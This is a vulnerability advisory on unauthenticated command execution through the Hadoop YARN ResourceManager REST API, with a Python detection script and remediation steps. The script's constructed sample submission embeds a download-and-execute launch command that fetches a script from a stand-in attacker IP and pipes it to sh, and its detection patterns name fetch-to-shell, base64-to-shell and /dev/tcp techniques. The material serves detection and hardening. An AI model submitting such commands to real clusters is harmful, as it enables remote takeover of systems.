#VU16008 OS command injection in Hadoop


Published: November 22, 2018 / Updated: June 26, 2023


Vulnerability identifier: #VU16008
Vulnerability risk: High
CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/U:Amber
CVE-ID: N/A
CWE-ID: CWE-78
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vulnerable software:
Hadoop
Software vendor:
Apache Foundation

Description

The vulnerability allows a remote unauthenticated attacker to execute arbitrary shell commands on the target system.

The vulnerability exists in the Hadoop YARN ResourceManager, whose REST API accepts application submissions that include the launch command for the application's container. When the ResourceManager is reachable over the network with Hadoop authentication disabled (no CVE is assigned because this is a deployment weakness rather than a code defect), a remote unauthenticated attacker can submit an application whose launch command is an arbitrary shell command and have it executed on a cluster node. This vector has been used in the wild to infect Linux Hadoop clusters with unsophisticated bots (DemonBot, Mirai variants) and fully compromise the affected systems.
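As an added example (not code from this advisory or from Apache Hadoop), the following Python shows the two checks a defender can run over what the ResourceManager sees: successful POSTs to the application-submission endpoints that carry no authenticated principal or arrive from outside trusted networks, and submitted launch commands that fetch and run a script. It assumes Combined Log Format lines from a reverse proxy in front of the ResourceManager web port (Hadoop's own HTTP server does not emit this format by default), a constructed trusted-network list, and a constructed sample log and submission body; the endpoint paths and the am-container-spec.commands.command field are those of the YARN ResourceManager REST API.

```python
"""Detection helpers for unauthenticated YARN application submission.

Added example, not code from the advisory or from Apache Hadoop. The log
format (CLF from a reverse proxy), the trusted networks and all sample data
are constructed assumptions for this example.
"""
import ipaddress
import json
import re
from dataclasses import dataclass

# Constructed sample access log. The third field is the authenticated user;
# "-" means the request carried no authenticated principal.
SAMPLE_LOG = """\
10.0.1.15 - - [22/Nov/2018:10:01:02 +0000] "GET /ws/v1/cluster/info HTTP/1.1" 200 512 "-" "curl/7.58.0"
203.0.113.77 - - [22/Nov/2018:10:03:10 +0000] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 84 "-" "python-requests/2.19.1"
203.0.113.77 - - [22/Nov/2018:10:03:11 +0000] "POST /ws/v1/cluster/apps HTTP/1.1" 202 0 "-" "python-requests/2.19.1"
10.0.1.20 - analyst [22/Nov/2018:10:05:00 +0000] "POST /ws/v1/cluster/apps HTTP/1.1" 202 0 "-" "Java/1.8.0_181"
10.0.1.21 - - [22/Nov/2018:10:06:00 +0000] "GET /ws/v1/cluster/apps HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# ResourceManager REST endpoints that create or submit an application.
SUBMIT_PATHS = {"/ws/v1/cluster/apps", "/ws/v1/cluster/apps/new-application"}

# Assumed (constructed) trusted ranges: cluster nodes and job-submission hosts.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]


@dataclass
class Finding:
    ip: str
    path: str
    reason: str
    timestamp: str


def parse_line(line):
    """Return the CLF fields of one line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_trusted(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def find_suspicious_submissions(log_text):
    """Flag accepted application submissions without a principal or from outside."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0].rstrip("/")
        if rec["method"] != "POST" or path not in SUBMIT_PATHS:
            continue
        if rec["status"].startswith(("4", "5")):
            continue  # rejected by the ResourceManager (e.g. 401/403); not a success
        reasons = []
        if rec["user"] == "-":
            reasons.append("no authenticated principal")
        if not is_trusted(rec["ip"]):
            reasons.append("source outside trusted networks")
        if reasons:
            findings.append(Finding(rec["ip"], path, "; ".join(reasons), rec["ts"]))
    return findings


# Constructed submission body in the shape the RM REST API accepts; the launch
# command is the field an attacker controls.
SAMPLE_SUBMISSION = json.dumps({
    "application-id": "application_1542880000000_0007",
    "application-name": "update",
    "application-type": "YARN",
    "am-container-spec": {
        "commands": {"command": "/bin/sh -c 'curl -fsSL http://203.0.113.77/d.sh | sh'"}
    },
})

DOWNLOAD_EXEC_RE = re.compile(r'\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b')
SHELL_WRAPPER_RE = re.compile(r'\b(ba)?sh\s+-c\b')
B64_EXEC_RE = re.compile(r'base64\s+(-d|--decode)[^|]*\|\s*(ba)?sh\b')


def launch_command(submission_json):
    """Extract am-container-spec.commands.command from a submission body."""
    body = json.loads(submission_json)
    return body.get("am-container-spec", {}).get("commands", {}).get("command") or ""


def classify_launch_command(cmd):
    """Return the download-and-execute patterns found in a launch command."""
    hits = []
    if DOWNLOAD_EXEC_RE.search(cmd):
        hits.append("download piped to shell")
    if SHELL_WRAPPER_RE.search(cmd):
        hits.append("shell -c wrapper")
    if B64_EXEC_RE.search(cmd):
        hits.append("base64 decode piped to shell")
    if "/dev/tcp/" in cmd:
        hits.append("bash /dev/tcp socket")
    return hits


if __name__ == "__main__":
    for f in find_suspicious_submissions(SAMPLE_LOG):
        print(f"{f.timestamp} {f.ip} {f.path}: {f.reason}")
    print(classify_launch_command(launch_command(SAMPLE_SUBMISSION)))
```

On a cluster that has never enabled authentication every submission logs with "-" as the principal, so the first rule fires on legitimate jobs too; that is the point, since it surfaces the misconfiguration the advisory describes rather than just one attacker. The launch-command patterns are deliberately narrow (fetch-and-pipe-to-shell, base64 decode, /dev/tcp) to keep false positives low on ordinary Java application masters; extend them to your own baseline.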


Remediation

Install update from vendor's website. Because no CVE is assigned and the issue lies in how the cluster is deployed, updating alone is not sufficient: enable Hadoop authentication (hadoop.security.authentication set to kerberos in core-site.xml, with the web endpoints protected via hadoop.http.authentication.type set to kerberos), and do not expose the ResourceManager web/REST port (8088 by default) to untrusted networks. Verify by confirming that an unauthenticated request to the application-submission endpoint is rejected from outside the cluster.

External links